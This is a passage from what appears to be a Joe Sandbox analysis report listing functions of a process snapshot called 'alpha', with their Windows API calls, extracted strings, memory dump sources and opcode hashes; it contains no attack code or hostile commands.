                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LocalTime$ErrorLast_get_osfhandle
                                                                                                                                                                        • String ID: %s$/-.$:
                                                                                                                                                                        • API String ID: 1644023181-879152773
                                                                                                                                                                        • Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                                                                        • Instruction ID: 5a0ab57edb512f36f9b822ff7e0aacd5c21040a458118f7d232b545be75b4d19
                                                                                                                                                                        • Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
                                                                                                                                                                        • Instruction Fuzzy Hash: 73918C63A18642D1FF109F64D4503FA63A0FF84B94F844136DA4EC6795EE3EE54ACB0A
                                                                                                                                                                        Function 00007FF6E944627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF6E9447251), ref: 00007FF6E944628E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ObjectSingleWait
                                                                                                                                                                        • String ID: wil
                                                                                                                                                                        • API String ID: 24740636-1589926490
                                                                                                                                                                        • Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                                                                        • Instruction ID: 255320c338283de0839182fe880549dff577547de3df15074543336a7110aa62
                                                                                                                                                                        • Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
                                                                                                                                                                        • Instruction Fuzzy Hash: E1412C33A08682C3F7604F55E40037A66B1EF86781F649131D90AC6A94DF3EE84EDF06
                                                                                                                                                                        Function 00007FF6E944CDC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                                                                                                                        • String ID: $Application$System
                                                                                                                                                                        • API String ID: 3377411628-1881496484
                                                                                                                                                                        • Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                                                                                        • Instruction ID: 1e25517e6ea00493b6777d5c8daac7f8a0d57e9a088d7acf854aa63bbb6e4c8d
                                                                                                                                                                        • Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
                                                                                                                                                                        • Instruction Fuzzy Hash: 23410473B08A42DAE7209FA0E4403ED77A5FB89748F445235DE4E82B98EF39D149C745
                                                                                                                                                                        Function 00007FF6E94214E8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                                                                                                                        • String ID: :$\
                                                                                                                                                                        • API String ID: 3961617410-1166558509
                                                                                                                                                                        • Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                                                                                        • Instruction ID: 1c39607460ae3d0be567e9c1927f7195a1b390b51a89bcdf18a47feaad569982
                                                                                                                                                                        • Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
                                                                                                                                                                        • Instruction Fuzzy Hash: 4E219F63A08642C6E7245F60A444279B6A1FF8DB94F848675DA0FC3390DF3DE48CC706
                                                                                                                                                                        Function 00007FF6E9427AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateDirectoryDriveFullNamePathTypememset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1397130798-0
                                                                                                                                                                        • Opcode ID: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                                                                                                                                                        • Instruction ID: eab0ab2fa775c3779899e1419bec95fbfc8d371a018df17a62cd1ff2807a744d
                                                                                                                                                                        • Opcode Fuzzy Hash: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
                                                                                                                                                                        • Instruction Fuzzy Hash: 3C919E33A48A82D6EB658F2194543B973E1FF88B84F448135DA4E83794DF3EE648C706
                                                                                                                                                                        Function 00007FF6E943258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E94306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306D6
                                                                                                                                                                          • Part of subcall function 00007FF6E94306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306F0
                                                                                                                                                                          • Part of subcall function 00007FF6E94306C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E943074D
                                                                                                                                                                          • Part of subcall function 00007FF6E94306C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E9430762
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF6E94325CA
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF6E94325E8
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF6E943260F
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF6E9432636
                                                                                                                                                                        • _wcsicmp.MSVCRT ref: 00007FF6E9432650
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _wcsicmp$Heap$AllocProcess
                                                                                                                                                                        • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                                                                                                                        • API String ID: 3407644289-1668778490
                                                                                                                                                                        • Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                                                                        • Instruction ID: 9215073e53b5d72b3419e73aa678f15d5df475a5b5bd516f1ee2120d46fbed61
                                                                                                                                                                        • Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
                                                                                                                                                                        • Instruction Fuzzy Hash: 3A314D63A1C612C6F724AF71E8193793694AF85B80F548035EA0EC62E5DE3EE40DC70B
                                                                                                                                                                        Function 00007FF6E9450C90 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
                                                                                                                                                                        • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                        • API String ID: 2516562204-381716982
                                                                                                                                                                        • Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                                                                                        • Instruction ID: b0ee8ff15a8bcd448c0ce00fd40dacf8da366bb54241b69f76d0695651ac44c7
                                                                                                                                                                        • Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
                                                                                                                                                                        • Instruction Fuzzy Hash: 34C1BB73A18A51C6E7608F61A8403BE77A1FF48B98F405125EE8D83B98DF3DE498C705
                                                                                                                                                                        Function 00007FF6E9437E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D46E
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF6E942D485
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D4EE
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: iswspace.MSVCRT ref: 00007FF6E942D54D
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D569
                                                                                                                                                                          • Part of subcall function 00007FF6E942D3F0: wcschr.MSVCRT ref: 00007FF6E942D58C
                                                                                                                                                                        • iswspace.MSVCRT ref: 00007FF6E9437EEE
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: wcschr$Heapiswspace$AllocProcess
                                                                                                                                                                        • String ID: A
                                                                                                                                                                        • API String ID: 3731854180-3554254475
                                                                                                                                                                        • Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                                                                        • Instruction ID: 0295f1f323de2dd52e52ddd8509302006aef7f17d40aea1841651220a9810db5
                                                                                                                                                                        • Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
                                                                                                                                                                        • Instruction Fuzzy Hash: 85A179B3909682C6E7209F61A45437DB7A0FF49790F008135DA8D87795EF3EE859CB0A
                                                                                                                                                                        Function 00007FF6E944A39C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111libraryloaderCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                                                                                                                        • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                                                                                                                        • API String ID: 1580871199-2613899276
                                                                                                                                                                        • Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                                                                                        • Instruction ID: 40b915719c5e0a68cf2e38e263d5ce115921f61e873c6ff3da45763a584f7d29
                                                                                                                                                                        • Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
                                                                                                                                                                        • Instruction Fuzzy Hash: 31515072A18B92D6EB108F55A8002B977E4FF88B84F445135DA5E83798DF3DD00ACB09
                                                                                                                                                                        Function 00007FF6E9427420 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                                                                                                                        • String ID: con
                                                                                                                                                                        • API String ID: 689241570-4257191772
                                                                                                                                                                        • Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                                                                                        • Instruction ID: 1ae487352446b11dac64dd52da5ca37f5c949ac48f6a7c21e47e0669b5d2f4fa
                                                                                                                                                                        • Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
                                                                                                                                                                        • Instruction Fuzzy Hash: 4E415E32A08A45C6E3108F15948437DBAA1FB89BA4F558334DE2983790DF3EE94DCB45
                                                                                                                                                                        Function 00007FF6E944A58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
                                                                                                                                                                        • String ID: PE
                                                                                                                                                                        • API String ID: 2941894976-4258593460
                                                                                                                                                                        • Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                                                                                        • Instruction ID: 32f4d8a42bd1011fea8040cdf475efe36591b3ca8cd0e2f2818bded6e0f1d897
                                                                                                                                                                        • Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
                                                                                                                                                                        • Instruction Fuzzy Hash: 40413262A08651D6EB209F51E410379BBE0FF89B90F448230DE5D86B95DF3EE44ACF06
                                                                                                                                                                        Function 00007FF6E9430010 Relevance: 13.7, APIs: 9, Instructions: 163fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF6E944849D,?,?,?,00007FF6E944F0C7), ref: 00007FF6E9430045
                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF6E944F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF6E944E964), ref: 00007FF6E9430071
                                                                                                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9430092
                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF6E94300A7
                                                                                                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9430148
                                                                                                                                                                        • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF6E9430181
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 734197835-0
                                                                                                                                                                        • Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                                                                                        • Instruction ID: a72c34c6ec7aae69770468cb8ff2fb82258a5d31919e17674b56a82a47bc0f54
                                                                                                                                                                        • Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
                                                                                                                                                                        • Instruction Fuzzy Hash: 35619EB3A18692C6E725CF31A8083797BA1BF46B44F448235DD5E82794DF7EA40DC70A
                                                                                                                                                                        Function 00007FF6E9449B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1424296487.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                        • Associated: 00000004.00000002.1424279852.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424361723.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424378702.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        • Associated: 00000004.00000002.1424428246.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Enum$Openwcsrchr
                                                                                                                                                                        • String ID: %s=%s$.$\Shell\Open\Command
                                                                                                                                                                        • API String ID: 3402383852-1459555574
                                                                                                                                                                        • Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
